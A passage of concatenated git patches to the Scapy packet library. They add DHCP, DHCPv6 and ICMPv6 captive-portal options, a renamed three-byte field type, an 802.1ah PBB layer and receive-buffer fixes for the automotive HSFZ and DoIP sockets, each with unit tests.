b"E\x00\x017\x00\x01\x00\x00@\x11{\xb3\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01#\xb8\xe7\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Sc\xa1\x13https://example.orgr\x13https://example.com\xff" s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), "end"])) assert s5 == b'E\x00\x01 \x00\x01\x00\x00@\x11{\xca\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0c\xabQ\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02\xff' @@ -80,6 +80,7 @@ assert p3[DHCP].options[6] == "end" p4 = IP(s4) assert DHCP in p4 assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") +assert p4[DHCP].options[1] == ("captive-portal", b"https://example.com") p5 = IP(s5) assert DHCP in p5 diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index ae23482e108..2806add53c3 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -1188,6 +1188,23 @@ r = b"\x00O\x00\x08\x00\x01\x00\x01\x02\x03\x04\x05" p = DHCP6OptClientLinkLayerAddr(r) assert p.clladdr == "00:01:02:03:04:05" +############ +############ ++ Test DHCP6 Option Captive-Portal + += Basic build & dissect +s = raw(DHCP6OptCaptivePortal()) +assert s == b"\x00\x67\x00\x00" + +p = DHCP6OptCaptivePortal(s) +assert p.optcode == 103 +assert p.optlen == 0 +assert p.URI == b"" + +p = DHCP6OptCaptivePortal(b"\x00\x67\x00\x13https://example.org") +assert p.optcode == 103 +assert p.optlen == 19 +assert p.URI == b"https://example.org" ############ ############ From f19daa6af6a1fda1892044110603d8ae9bc3652e Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sat, 8 Jul 2023 00:12:23 +0200 Subject: [PATCH 1050/1632] Add LE3BytesEnumField and LEX3BytesEnumField (#4041) * Add LE3BytesEnumField and LEX3BytesEnumField * Cleanup, code-reuse + what I had in mind --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- doc/scapy/build_dissect.rst | 6 ++-- scapy/contrib/loraphy2wan.py | 8 +++--- scapy/contrib/scada/pcom.py | 6 ++-- scapy/fields.py | 54 ++++++++++++++++++++++++++---------- test/fields.uts | 18 +++++++++++- 5 files changed, 68 insertions(+), 24 deletions(-) diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index b099798137a..26c0148ea14 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -869,10 +869,12 @@ Legend: XShortField X3BytesField # three bytes as hex - LEX3BytesField # little endian three bytes as hex + XLE3BytesField # little endian three bytes as hex ThreeBytesField # three bytes as decimal LEThreeBytesField # little endian three bytes as decimal - + LE3BytesEnumField + XLE3BytesEnumField + IntField SignedIntField LEIntField diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 01487d457dd..3750466aa95 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -25,7 +25,6 @@ ConditionalField, IntField, LEShortField, - LEX3BytesField, MayEnd, MultipleTypeField, PacketField, @@ -36,6 +35,7 @@ XBitField, XByteField, XIntField, + XLE3BytesField, XLEIntField, XShortField, ) @@ -80,7 +80,7 @@ def extract_padding(self, p): class DevAddrElem(Packet): name = "DevAddrElem" fields_desc = [XByteField("NwkID", 0x0), - LEX3BytesField("NwkAddr", b"\x00" * 3)] + XLE3BytesField("NwkAddr", b"\x00" * 3)] CIDs_up = {0x01: "ResetInd", @@ -609,8 +609,8 @@ class Join_Request(Packet): class Join_Accept(Packet): name = "Join_Accept" dcflist = False - fields_desc = [LEX3BytesField("JoinAppNonce", 0), - LEX3BytesField("NetID", 0), + fields_desc = [XLE3BytesField("JoinAppNonce", 0), + XLE3BytesField("NetID", 0), XLEIntField("DevAddr", 0), DLsettings, XByteField("RxDelay", 0), diff --git a/scapy/contrib/scada/pcom.py b/scapy/contrib/scada/pcom.py index d8386a22142..98603260588 100755 --- a/scapy/contrib/scada/pcom.py +++ b/scapy/contrib/scada/pcom.py @@ -21,7 +21,7 @@ from scapy.layers.inet import TCP from scapy.fields import XShortField, ByteEnumField, XByteField, \ StrFixedLenField, StrLenField, LEShortField, \ - LEFieldLenField, LEX3BytesField, XLEShortField + LEFieldLenField, XLE3BytesField, XLEShortField from scapy.volatile import RandShort from scapy.compat import bytes_encode, orb @@ -193,7 +193,7 @@ class PCOMBinaryRequest(PCOMBinary): XByteField("id", 0x0), XByteField("reserved1", 0xfe), XByteField("reserved2", 0x1), - LEX3BytesField("reserved3", 0x0), + XLE3BytesField("reserved3", 0x0), PCOMBinaryCommandField("command", None), XByteField("reserved4", 0x0), StrFixedLenField("commandSpecific", '', 6), @@ -212,7 +212,7 @@ class PCOMBinaryResponse(PCOMBinary): XByteField("reserved1", 0xfe), XByteField("id", 0x0), XByteField("reserved2", 0x1), - LEX3BytesField("reserved3", 0x0), + XLE3BytesField("reserved3", 0x0), PCOMBinaryCommandField("command", None), XByteField("reserved4", 0x0), StrFixedLenField("commandSpecific", '', 6), diff --git a/scapy/fields.py b/scapy/fields.py index a07b11b01cd..bd031374a93 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1085,12 +1085,21 @@ def getfield(self, pkt, s): return s[3:], self.m2i(pkt, struct.unpack(self.fmt, s[:3] + b"\x00")[0]) # noqa: E501 -class LEX3BytesField(LEThreeBytesField, XByteField): +class XLE3BytesField(LEThreeBytesField, XByteField): def i2repr(self, pkt, x): # type: (Optional[Packet], int) -> str return XByteField.i2repr(self, pkt, x) +def LEX3BytesField(*args, **kwargs): + # type: (*Any, **Any) -> Any + warnings.warn( + "LEX3BytesField is deprecated. Use XLE3BytesField", + DeprecationWarning + ) + return XLE3BytesField(*args, **kwargs) + + class NBytesField(Field[int, List[int]]): def __init__(self, name, default, sz): # type: (str, Optional[int], int) -> None @@ -2552,6 +2561,10 @@ def any2i_one(self, pkt, x): x = self.s2i_cb(x) return cast(I, x) + def _i2repr(self, pkt, x): + # type: (Optional[Packet], I) -> str + return repr(x) + def i2repr_one(self, pkt, x): # type: (Optional[Packet], I) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): @@ -2564,7 +2577,7 @@ def i2repr_one(self, pkt, x): ret = self.i2s_cb(x) if ret is not None: return ret - return repr(x) + return self._i2repr(pkt, x) def any2i(self, pkt, x): # type: (Optional[Packet], Any) -> Union[I, List[I]] @@ -2713,18 +2726,31 @@ def __init__(self, name, default, enum): class XShortEnumField(ShortEnumField): - def i2repr_one(self, pkt, x): - # type: (Optional[Packet], int) -> str - if self not in conf.noenum and not isinstance(x, VolatileValue): - if self.i2s is not None: - try: - return self.i2s[x] - except KeyError: - pass - elif self.i2s_cb: - ret = self.i2s_cb(x) - if ret is not None: - return ret + def _i2repr(self, pkt, x): + # type: (Optional[Packet], Any) -> str + return lhex(x) + + +class LE3BytesEnumField(LEThreeBytesField, _EnumField[int]): + __slots__ = EnumField.__slots__ + + def __init__(self, name, default, enum): + # type: (str, Optional[int], Dict[int, str]) -> None + _EnumField.__init__(self, name, default, enum) + LEThreeBytesField.__init__(self, name, default) + + def any2i(self, pkt, x): + # type: (Optional[Packet], Any) -> int + return _EnumField.any2i(self, pkt, x) # type: ignore + + def i2repr(self, pkt, x): # type: ignore + # type: (Optional[Packet], Any) -> Union[List[str], str] + return _EnumField.i2repr(self, pkt, x) + + +class XLE3BytesEnumField(LE3BytesEnumField): + def _i2repr(self, pkt, x): + # type: (Optional[Packet], Any) -> str return lhex(x) diff --git a/test/fields.uts b/test/fields.uts index 8081107b21e..b3f3cc6f1c2 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -164,7 +164,7 @@ class TestThreeBytesField(Packet): fields_desc = [ X3BytesField('test1', None), ThreeBytesField('test2', None), - LEX3BytesField('test3', None), + XLE3BytesField('test3', None), LEThreeBytesField('test4', None), ] @@ -1199,6 +1199,22 @@ class Breakfast(Packet): assert raw(Breakfast(juice="ORANGE")) == b"\x00\x01" += LE3BytesEnumField +~ field le3bytesenumfield + +f = LE3BytesEnumField('test', 0, {0: 'Foo', 1: 'Bar'}) + += LE3BytesEnumField.i2repr_one +~ field le3bytesenumfield + +assert f.i2repr_one(None, 0) == 'Foo' +assert f.i2repr_one(None, 1) == 'Bar' +assert f.i2repr_one(None, 2) == '2' + += XLE3BytesEnumField + +assert XLE3BytesEnumField("a", 0, {0: "test"}).i2repr_one(None, 0) == "test" +assert XLE3BytesEnumField("a", 0, {0: "test"}).i2repr_one(None, 1) == "0x1" ############ ############ From 66fdfa362185e376f7bff483bc4675f6e4a268c4 Mon Sep 17 00:00:00 2001 From: Alex Forencich Date: Fri, 7 Jul 2023 15:13:50 -0700 Subject: [PATCH 1051/1632] Implement 802.1ah I-Tag for PBB MAC-in-MAC encapsulation (#4009) * Implement 802.1ah I-tag for PBB mac-in-mac encapsulation Signed-off-by: Alex Forencich * Add unit tests for 802.1Q Signed-off-by: Alex Forencich * Remove SPBM contrib * Fix some ETHER_TYPES --------- Signed-off-by: Alex Forencich Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/spbm.py | 58 ---------------------------------------- scapy/layers/l2.py | 35 +++++++++++++++++++++++- test/contrib/spbm.uts | 18 ------------- test/scapy/layers/l2.uts | 30 +++++++++++++++++++++ 4 files changed, 64 insertions(+), 77 deletions(-) delete mode 100644 scapy/contrib/spbm.py delete mode 100644 test/contrib/spbm.uts diff --git a/scapy/contrib/spbm.py b/scapy/contrib/spbm.py deleted file mode 100644 index fae33866c7b..00000000000 --- a/scapy/contrib/spbm.py +++ /dev/null @@ -1,58 +0,0 @@ -# SPDX-License-Identifier: GPL-2.0-or-later -# This file is part of Scapy -# See https://scapy.net/ for more information - -# scapy.contrib.description = Shorest Path Bridging Mac-in-mac (SBPM) -# scapy.contrib.status = loads - -""" -IEEE 802.1aq - Shorest Path Bridging Mac-in-mac (SPBM): - -Ethernet based link state protocol that enables -- Layer 2 Unicast -- Layer 2 Multicast -- Layer 3 Unicast -- Layer 3 Multicast virtualized services - -https://en.wikipedia.org/wiki/IEEE_802.1aq -Modeled after the scapy VXLAN contribution - -Example SPB Frame Creation -__________________________ - -Note the outer Dot1Q Ethertype marking (0x88e7) - -:: - backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100) # noqa: E501 - backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7) - backboneServiceID = SPBM(prio=1,isid=20011) - customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100) # noqa: E501 - customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800) - customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106) # noqa: E501 - customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86) - - spb_example = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload" # noqa: E501 -""" - -from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, ThreeBytesField -from scapy.layers.l2 import Ether, Dot1Q, Dot1AD - - -class SPBM(Packet): - name = "SPBM" - fields_desc = [BitField("prio", 0, 3), - BitField("dei", 0, 1), - BitField("nca", 0, 1), - BitField("res1", 0, 1), - BitField("res2", 0, 2), - ThreeBytesField("isid", 0)] - - def mysummary(self): - return self.sprintf("SPBM (isid=%SPBM.isid%") - - -bind_layers(Ether, SPBM, type=0x88e7) -bind_layers(Dot1Q, SPBM, type=0x88e7) -bind_layers(Dot1AD, SPBM, type=0x88e7) -bind_layers(SPBM, Ether) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index e7973a1cda8..ea3e05d808c 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -45,6 +45,7 @@ SourceIPField, StrFixedLenField, StrLenField, + ThreeBytesField, XByteField, XIntField, XShortEnumField, @@ -237,7 +238,8 @@ def i2m(self, pkt, x): 21: "ATM", } -ETHER_TYPES[0x88a8] = '802_AD' +ETHER_TYPES[0x88a8] = '802_1AD' +ETHER_TYPES[0x88e7] = '802_1AH' ETHER_TYPES[ETH_P_MACSEC] = '802_1AE' @@ -686,25 +688,55 @@ class Dot1AD(Dot1Q): name = '802_1AD' +class Dot1AH(Packet): + name = "802_1AH" + fields_desc = [BitField("prio", 0, 3), + BitField("dei", 0, 1), + BitField("nca", 0, 1), + BitField("res1", 0, 1), + BitField("res2", 0, 2), + ThreeBytesField("isid", 0)] + + def answers(self, other): + # type: (Packet) -> int + if isinstance(other, Dot1AH): + if self.isid == other.isid: + return self.payload.answers(other.payload) + return 0 + + def mysummary(self): + # type: () -> str + return self.sprintf("802.1ah (isid=%Dot1AH.isid%") + + +conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3) + + bind_layers(Dot3, LLC) bind_layers(Ether, LLC, type=122) bind_layers(Ether, LLC, type=34928) bind_layers(Ether, Dot1Q, type=33024) bind_layers(Ether, Dot1AD, type=0x88a8) +bind_layers(Ether, Dot1AH, type=0x88e7) bind_layers(Dot1AD, Dot1AD, type=0x88a8) bind_layers(Dot1AD, Dot1Q, type=0x8100) +bind_layers(Dot1AD, Dot1AH, type=0x88e7) bind_layers(Dot1Q, Dot1AD, type=0x88a8) +bind_layers(Dot1Q, Dot1AH, type=0x88e7) +bind_layers(Dot1AH, Ether) bind_layers(Ether, Ether, type=1) bind_layers(Ether, ARP, type=2054) bind_layers(CookedLinux, LLC, proto=122) bind_layers(CookedLinux, Dot1Q, proto=33024) bind_layers(CookedLinux, Dot1AD, type=0x88a8) +bind_layers(CookedLinux, Dot1AH, type=0x88e7) bind_layers(CookedLinux, Ether, proto=1) bind_layers(CookedLinux, ARP, proto=2054) bind_layers(MPacketPreamble, Ether) bind_layers(GRE, LLC, proto=122) bind_layers(GRE, Dot1Q, proto=33024) bind_layers(GRE, Dot1AD, type=0x88a8) +bind_layers(GRE, Dot1AH, type=0x88e7) bind_layers(GRE, Ether, proto=0x6558) bind_layers(GRE, ARP, proto=2054) bind_layers(GRE, GRErouting, {"routing_present": 1}) @@ -714,6 +746,7 @@ class Dot1AD(Dot1Q): bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3) bind_layers(SNAP, Dot1Q, code=33024) bind_layers(SNAP, Dot1AD, type=0x88a8) +bind_layers(SNAP, Dot1AH, type=0x88e7) bind_layers(SNAP, Ether, code=1) bind_layers(SNAP, ARP, code=2054) bind_layers(SNAP, STP, code=267) diff --git a/test/contrib/spbm.uts b/test/contrib/spbm.uts deleted file mode 100644 index fb135e5dede..00000000000 --- a/test/contrib/spbm.uts +++ /dev/null @@ -1,18 +0,0 @@ -% Regression tests for the spbm module - -+ Basic SPBM test - -= Test build and dissection - -backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100) -backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7) -backboneServiceID = SPBM(prio=1,isid=20011) -customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100) -customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800) -customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106) -customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86) - -pkt = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload" -pkt = Ether(raw(pkt)) -assert SPBM in pkt -assert pkt[SPBM].payload.payload.payload.src == '10.100.11.10' diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts index b13b82bc676..d4d5185670d 100644 --- a/test/scapy/layers/l2.uts +++ b/test/scapy/layers/l2.uts @@ -191,6 +191,36 @@ p = ARP(pdst='192.168.178.0/24') assert "Net" in repr(p) +############ +############ ++ 802.1Q bridging tests + += 802.1Q VLAN +p = Ether(raw(Ether() / Dot1Q(vlan=99) / b"Payload")) +assert p[Dot1Q].vlan == 99 + += 802.1ad Q-in-Q +p = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1Q(vlan=99) / b"Payload")) +assert p[Dot1AD].vlan == 88 +assert p[Dot1Q].vlan == 99 + += 802.1ah PBB mac-in-mac +p = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1AH(isid=123456) / Ether() / Dot1Q(vlan=99) / b"Payload")) +assert p[Dot1AD].vlan == 88 +assert p[Dot1AH].isid == 123456 +assert p[Dot1Q].vlan == 99 + += 802.1ah PBB mac-in-mac - answer +p = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1AH(isid=123456) / Ether() / Dot1Q(vlan=99) / b"Payload")) +q = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1AH(isid=123456) / Ether() / Dot1Q(vlan=99) / b"Response")) +r = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1AH(isid=123456) / Ether() / Dot1Q(vlan=90) / b"Payload")) +s = Ether(raw(Ether() / Dot1AD(vlan=88) / Dot1AH(isid=987654) / Ether() / Dot1Q(vlan=99) / b"Payload")) + +assert q.answers(p) +assert not r.answers(p) +assert not s.answers(p) + + ############ ############ + CookedLinux From 6dbdc37bd896c5477f4f9e28e7d1bff63f3dc6fd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 8 Jul 2023 19:03:13 +0200 Subject: [PATCH 1052/1632] Fix recv of HSFZ and DoIP (#4053) * Fix recv of HSFZ and DoIP * add unit test for hsfz * add test case for DoIP --- scapy/contrib/automotive/bmw/hsfz.py | 21 ++++++++++++++++++++ scapy/contrib/automotive/doip.py | 21 ++++++++++++++++++++ test/contrib/automotive/bmw/hsfz.uts | 29 ++++++++++++++++++++++++++++ test/contrib/automotive/doip.uts | 27 ++++++++++++++++++++++++++ 4 files changed, 98 insertions(+) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index c177dd620c2..376a968e4b4 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -86,6 +86,27 @@ def __init__(self, ip='127.0.0.1', port=6801): s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.connect((self.ip, self.port)) StreamSocket.__init__(self, s, HSFZ) + self.buffer = b"" + + def recv(self, x=MTU): + # type: (int) -> Optional[Packet] + if self.buffer: + len_data = self.buffer[:4] + else: + len_data = self.ins.recv(4, socket.MSG_PEEK) + if len(len_data) != 4: + return None + + len_int = struct.unpack(">I", len_data)[0] + len_int += 6 + self.buffer += self.ins.recv(len_int - len(self.buffer)) + + if len(self.buffer) != len_int: + return None + + pkt = self.basecls(self.buffer) # type: Packet + self.buffer = b"" + return pkt class UDS_HSFZSocket(HSFZSocket): diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 98dde3944ed..bce9944aaa0 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -287,12 +287,33 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, self.ip = ip self.port = port self.source_address = source_address + self.buffer = b"" self._init_socket() if activate_routing: self._activate_routing( source_address, target_address, activation_type, reserved_oem) + def recv(self, x=MTU): + # type: (int) -> Optional[Packet] + if self.buffer: + len_data = self.buffer[:8] + else: + len_data = self.ins.recv(8, socket.MSG_PEEK) + if len(len_data) != 8: + return None + + len_int = struct.unpack(">I", len_data[4:8])[0] + len_int += 8 + self.buffer += self.ins.recv(len_int - len(self.buffer)) + + if len(self.buffer) != len_int: + return None + + pkt = self.basecls(self.buffer) # type: Packet + self.buffer = b"" + return pkt + def _init_socket(self, sock_family=socket.AF_INET): # type: (int) -> None s = socket.socket(sock_family, socket.SOCK_STREAM) diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index e889867b1dd..aad8aa6c14a 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -74,3 +74,32 @@ assert pkt.dst == 0x10 assert pkt.type == 1 assert pkt.securitySeed == b"0" * 0xfff00 += Test HSFZSocket + + +server_up = threading.Event() +def server(): + buffer = bytes(HSFZ(type=1, src=0xf4, dst=0x10) / Raw(b'\x11\x22\x33' * 1024)) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('127.0.0.1', 6801)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + connection.send(buffer[:1024]) + time.sleep(0.1) + connection.send(buffer[1024:]) + connection.close() + finally: + sock.close() + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = HSFZSocket() + +pkts = sock.sniff(timeout=1, count=1) +assert len(pkts) == 1 +assert len(pkts[0]) > 2048 diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 99ebef167d1..5d8101651e8 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -380,3 +380,30 @@ assert req.hashret() == resp.hashret() # exclude TCP layer from answers check assert resp[3].answers(req[3]) assert not req[3].answers(resp[3]) + += Test DoIPSocket + +server_up = threading.Event() +def server(): + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('127.0.0.1', 13400)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + connection.send(buffer) + connection.close() + finally: + sock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = DoIPSocket(activate_routing=False) + +pkts = sock.sniff(timeout=1, count=2) +assert len(pkts) == 2 From cbcd038d84a292ced96ddb6c0d443e1f6166352c Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 10 Jul 2023 19:42:29 +0300 Subject: [PATCH 1053/1632] [inet6] add Captive-Portal RA option (#4059) https://www.rfc-editor.org/rfc/rfc8910.html#name-the-captive-portal-ipv6-ra- 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Length | URI . +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ . . . . . . . +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: 37 Length: 8-bit unsigned integer. The length of the option (including the Type and Length fields) in units of 8 bytes. URI: The URI for the captive portal API endpoint to which the user should connect. This MUST be padded with NUL (0x00) to make the total option length (including the Type and Length fields) a multiple of 8 bytes. Combined with f37c4021eb191b2cf95693dc308a06d2bfb17717 this patch should fully cover RFC8910. The patch has been used and tested downstream for about a week and helped to trigger various issues like https://github.com/systemd/systemd/issues/28229 https://github.com/systemd/systemd/issues/28231 https://github.com/systemd/systemd/issues/28277 https://github.com/systemd/systemd/issues/28283 --- scapy/layers/inet6.py | 36 +++++++++++++++++++++++++++++++++++- test/scapy/layers/inet6.uts | 30 ++++++++++++++++++++++++++++++ 2 files changed, 65 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index b54cca234c4..2619c828808 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1718,7 +1718,8 @@ def extract_padding(self, s): 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", - 31: "ICMPv6NDOptDNSSL" + 31: "ICMPv6NDOptDNSSL", + 37: "ICMPv6NDOptCaptivePortal", } icmp6ndraprefs = {0: "Medium (default)", @@ -2053,6 +2054,39 @@ class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 def mysummary(self): return self.sprintf("%name% ") + ", ".join(self.searchlist) + +# URI MUST be padded with NUL (0x00) to make the total option length +# (including the Type and Length fields) a multiple of 8 bytes. +# https://www.rfc-editor.org/rfc/rfc8910.html#name-the-captive-portal-ipv6-ra- +class CaptivePortalURI(StrLenField): + def i2len(self, pkt, x): + return len(self.i2m(pkt, x)) + + def i2m(self, pkt, x): + r = (len(x) + 2) % 8 + if r: + x += b"\x00" * (8 - r) + return x + + def m2i(self, pkt, x): + return x.rstrip(b"\x00") + + +class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 + name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" + fields_desc = [ByteField("type", 37), + FieldLenField("len", None, length_of="URI", fmt="B", + adjust=lambda pkt, x: (2 + x) // 8), + + # Zero length is nonsensical but it's treated as 1 here to + # let the dissector skip bogus options more or less gracefully + CaptivePortalURI("URI", "", + length_from=lambda pkt: 8 * max(pkt.len, 1) - 2) + ] + + def mysummary(self): + return self.sprintf("%name% %URI%") + # End of ICMPv6 Neighbor Discovery Options. diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 4bc7e4573d3..18d19babc1d 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1208,6 +1208,36 @@ p.type == 31 and p.len == 2 and p.res == 0 and p.lifetime == 60 and p.searchlist ICMPv6NDOptDNSSL(searchlist=["home.", "office.", "{"]).mysummary() == "ICMPv6 Neighbor Discovery Option - DNS Search List Option home., office., {" +############ +############ ++ ICMPv6NDOptCaptivePortal Class Test + += ICMPv6NDOptCaptivePortal - Basic Instantiation +raw(ICMPv6NDOptCaptivePortal()) == b"\x25\x01\x00\x00\x00\x00\x00\x00" + += ICMPv6NDOptCaptivePortal - Instantiation with captive portal URI +raw(ICMPv6NDOptCaptivePortal(URI="https://example.com")) == b"\x25\x03https://example.com\x00\x00\x00" + += ICMPv6NDOptCaptivePortal - Instantiation where total length is already a multiple of 8 bytes +p = ICMPv6NDOptCaptivePortal(URI="abcdef") +len(p) == 8 and raw(p) == b"\x25\x01abcdef" and ICMPv6NDOptCaptivePortal(raw(p)).URI == b"abcdef" + += ICMPv6NDOptCaptivePortal - Basic Dissection +p = ICMPv6NDOptCaptivePortal(b"\x25\x01\x00\x00\x00\x00\x00\x00") +p.type == 37 and p.len == 1 and p.URI == b"" + += ICMPv6NDOptCaptivePortal - Basic Dissection with captive portal URI +p = 